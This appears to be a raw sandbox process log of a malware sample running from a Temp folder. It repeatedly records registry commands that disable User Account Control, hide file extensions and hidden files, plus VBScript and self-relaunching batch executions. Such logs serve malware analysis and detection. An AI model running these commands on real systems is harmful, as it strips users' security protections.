reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FuckwYEI.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TqogQMIw.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mUMsIUsw.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZokwQIEw.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MOUgEIkY.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dmkwMsII.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iYkwkMQw.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SGMgwAwE.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OoIAgIAY.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UCkAIIMk.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hOEscksA.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xUIgYwgw.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jUAEIokI.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pwIosUkI.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SMQAUEsQ.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IGkMIMUE.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oOQQEwII.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KKgkUMMs.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jeEAMYIU.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BCcYQUok.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JKMoogos.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VMscUgcQ.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

